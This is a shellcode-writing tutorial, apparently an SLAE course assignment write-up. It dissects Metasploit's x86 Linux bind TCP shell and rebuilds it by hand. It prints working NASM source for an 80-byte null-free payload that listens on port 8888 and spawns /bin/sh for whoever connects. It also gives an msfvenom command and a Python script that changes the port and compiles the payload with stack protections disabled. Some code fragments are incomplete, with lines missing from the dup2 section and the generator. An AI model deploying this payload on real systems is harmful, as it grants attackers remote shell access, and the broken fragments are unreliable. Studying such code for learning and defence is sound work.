Dear Readers, we all in the infosec community use bind TCP shell almost on a daily basis. I too have seen many people copying shellcodes blindly from the internet and just pasting them into the exploits without knowing what those shellcodes might be carrying. Today, we will uncover the working of bind TCP shell and based on the analysis, we will try to develop one ourselves. If you are not familiar with the assembly, Enroll yourself into SLAE course from
SecurityTube, its one of the best classes available out there and i am able to write this post based on the advanced knowledge i gained from the course itself. Anyways, The agenda of this exercise is to:
- Analyze the Bind Shell generated from Metasploit
- Create your own shellcode based on the analysis
- Remove any Null bytes (Bad Characters)
- Generate a space friendly shellcode (minimalistic)
- Write a wrapper to dynamically change the bind port
So let's get started, we will use
libemu to analyze the
bind_shell_tcp shellcode for x86 Linux. The analytics for this shellcode can be drawn through the following command:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f raw | sctest -vvv -Ss 10000
Creating a graphical representation of the shellcode using libemu, we have the following flow diagram of the bind_shell_tcp payload as shown in the next screen:
|
Analysis of the BIND TCP Shellcode generated using msfvenom |
We can see that we have a pretty straightforward workflow which displays all the important system calls used by the bind_shell_tcp shellcode. However, let us try tracing all the system calls, parameters involved, etc. using
strace as shown on the following screen:
|
Strace Analysis on the shellcode |
We can clearly see the order and parameters passed to the system calls. Let's use this information as a base for our shellcode and jump directly into building a shellcode from the very scratch:
xor ebx,ebx ; Clearing EBX Register
xor eax,eax ; Clearing EAX Register
mov al,102 ; Moving SocketCall to EAX(Sys Call Number= 102)
inc bl ; (Saving 1 Byte) Moving 1 to EBX with a Byte Less, otherwise w$
push esi ; Pushing 0 onto the stack(0: IPPROTO_IP)
push byte 1 ; Pushing 1 onto the stack(1: SOCK_STREAM)
push byte 2 ; Pushing 2 onto the stack(2: AF_INET)
mov ecx,esp ; Load pointer to the stack structure to ECX
int 0x80 ; Calling Interrupt
What did we do? Initially, we cleared both EAX and EBX registers and moved the socketcall identifier (102 | 0x66) to EAX(AL), We could have moved 1 to BL. Instead, we used INC(Increment) instruction which makes the value inside BL as 1. We pushed 0 to the stack which is the value for IPPROTO_IP. Similarly, we pushed 1 and 2 onto the stack which is nothing but SOCK_STREAM and PF_INET. This makes stack contain {2,1,0}. We have already set EAX and EBX, we need to set ECX to the stack. Hence, we move ESP to ECX. Next, we simply call the Interrupt. Looking at the socketcall:
int socketcall(int call, unsigned long *args);
- The socketcall identifier is 102 ---> EAX
- int call identifier is 1 ----> 1: SYS_SOCKET ---> EBX
- unsigned long *args ---->{2,1,0} ---> Address ---> ECX
Setting up the SYS_SOCKET, next task is to setup bind system call, let's get started:
xchg edi,eax ; Saving the Result After Syscall from EAX to EDI
push esi ; Zero Pushed onto the Stack
push word 0xb822 ; Port 8888 Pushed onto the Stack
push word 2 ; 2 Pushed onto the Stack
mov ebx,esp ; Top of the stack stored to EBX--->{0xb8220002,0}
push byte 16 ; 16 Pushed onto the Stack
push ebx ; Pointer ---> {Port,0}
push edi ; EDI Points to Result from SocketCALL
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
mov al,102 ; SOCKETCALL Identifier
mov bl,2 ; int call is bind here; 2
mov ecx,esp ; Address of the top of the stack to ECX
int 0x80 ; Interrupt
int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
We store the result from the previous call to EDI from EAX which is nothing but the value to be placed in
sockfd. We push 0 onto the stack with PUSH ESI and then PUSH 0xb8220002 onto the stack. We did this in two steps using push word instruction because pushing it in one go would have resulted in a NULL byte generated by leading two zeros of the 0002. So, now our stack becomes {b8220002, 00000000}. We store the address of current ESP to EBX. Next, we push 16 which is
socklen_t, we push EBX as
sockaddr, and we push
sockfd stored in EDI.
We now have the complete structure of arguments present on the stack, and since everything is placed correctly on the stack, we can clear the EBX and EAX registers. Let's issue another SOCKETCALL with call type as SYS_BIND denoted by 2 as the identifier. So, we move 102 to EAX, 2 to EBX and Top of the stack which contains our parameter structure to ECX and issues the interrupt. The Next call is to listen. Let 's see what parameters are required for this call to work:
int listen(int sockfd, int backlog);
push esi ; Backlog Value 0
push edi ; Pushing Sockfd onto the stack
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
mov al,102 ; SOCKETCALL
mov bl,4 ; Listen call
mov ecx,esp ; Pointing pushed values to ECX
int 0x80 ; Interrupt
We know we have our sockfd in the EDI let's push it to the stack after pushing 0 for the backlog by issuing PUSH ESI. Next, we just clear off EAX and EBX registers and build registers to issue another SOCKETCALL. But this time, we move 4 to EBX which denotes SYS_Listen call, we move the top of the stack to ECX and simply issue the interrupt. Next, we move to the accept call as follows:
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
We will similarly setup this system call like the way we did for the earlier ones:
xor ebx,ebx ; Clearing EBX
mul ebx ; Clearing EAX
push esi ; 0
push esi ; 0
push edi ; Sockfd
mov al,102 ; Socketcall
mov bl,5 ; accept
mov ecx,esp ; moving pointer to {sockfd,0,0} to ECX
int 0x80 ; Generating interrupt
Pretty straightforward! We are putting the value 0 for sockadd* and socklen_t while having the sockfd pushed through EDI. We just set up this call using 5(accept) in EBX. The final segment of the code contains two crucial system calls which are dup2 and execve. Let's see the code fragment:
xor ecx,ecx ; Clearing ECX |
mov cl,2 ; Moving 2 to ECX |
int 0x80 ; Calling Interrupt |
jns loop ; Jump to loop till SF not set |
mov ebx,esp ; Pointer to Structures in Stack(Top) |
int 0x80 ; Interrupt
We simply exchange the result to EBX from EAX which held the result from the last system call. Next, we cleared ECX and moved value 2 into it. We did this because of 3 distinct values of descriptors for which we will call dup2. Next, we issue dup2 call denoted by 63 in a loop till ECX becomes 0 and Finally, we push null terminated /bin//sh and point it to EBX:
Next, we clear out ECX and EDX using 0 from EAX. We move call number 11(EXECVE) to EAX and issue the interrupt. Let's extract the shellcode from the program as follows:
Compiling the C program and running the shellcode, we can see that it works flawlessly:
Everything works flawlessly here.
The final version of the code can be obtained at:
https://github.com/nipunjaswal/slae-exam/tree/master/ASSGN-1
We have a NULL free shellcode. However, the length of the shellcode is something which bothers me. A valid shellcode should be as small as possible, and 108 bytes just doesn't seem to fit in that definition. I have tweaked the code to make it smaller
(80 Bytes) using the following set of techniques:
- Register Re-Use
- Making use of PUSH - POP Instructions
- Using Single Byte Instructions
- XCGG Instructions and many more
The final minimalistic shellcode is as follows:
global _start
section .text
_start:
; SYS_SOCKET
push 0x66
pop eax
cdq
push ebx
inc ebx
push ebx
push 0x2
mov ecx,esp
int 0x80
; SYS_BIND
pop ebx
pop esi
push edx
push word 0xb822
push edx
push byte 0x02
push 0x10
push ecx
push eax
mov ecx,esp
mov al,0x66
int 0x80
; SYS_LISTEN
pop edx
pop eax
xor eax,eax
push eax
push edx
cdq
mov bl,0x4
mov al,0x66
int 0x80
; SYS_ACCEPT
inc ebx
mov al,0x66
int 0x80
; DUP2
xchg eax, ebx
pop ecx
loop:
mov al,63
int 0x80
dec ecx
jns loop
done:
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
mov ecx,esp
mov al,0xb ; EXECVE CALL
int 0x80
Additionally, since we know that the port 8888 is denoted in the shellcode using
"\x22\xb8" bytes, we can simply build a generator script in python which will replace these bytes with the bytes of some other port and make the shellcode to change the port on the fly:
print "Stub File:"+sys.argv[1] |
print "Port Used:"+sys.argv[2] |
with open(sys.argv[1]+".c", "rb") as f: |
port = hex(int(sys.argv[2])).split('x')[1] |
fh, sh = port[:2],port[2:] |
if len(fh) == 1: fh = "0" + fh |
if len(sh) == 1: sh = "0" + sh |
_p = "\\x{0}\\x{1}".format(fh,sh) |
for j,i in enumerate(contents): |
print "Line Number :" + str(j) |
contents[j] = '"' + _p +'"' |
nf = sys.argv[1]+"_new.c" |
with open(nf, "wb") as f: |
os.system("gcc {0} -o {1} -fno-stack-protector -z execstack".format(nf,sys.argv[1])) |
os.system("rm {0}".format(nf))
We can run the generator as shown on the following screen:
Following are the links to all the codes used in the exercise:
- bind_shell_108.nasm : 108 bytes original null-free shellcode
- bind_shell_80.nasm : 80 bytes null-free shellcode
- shellcode108.c : C file for 108 bytes bind TCP shellcode [Generator Format]
- shellcode80.c : C file for 80 bytes bind TCP shellcode [Generator Format]
- linux_bind_shell_generator.py : Port Wrapper for Shellcode
No comments: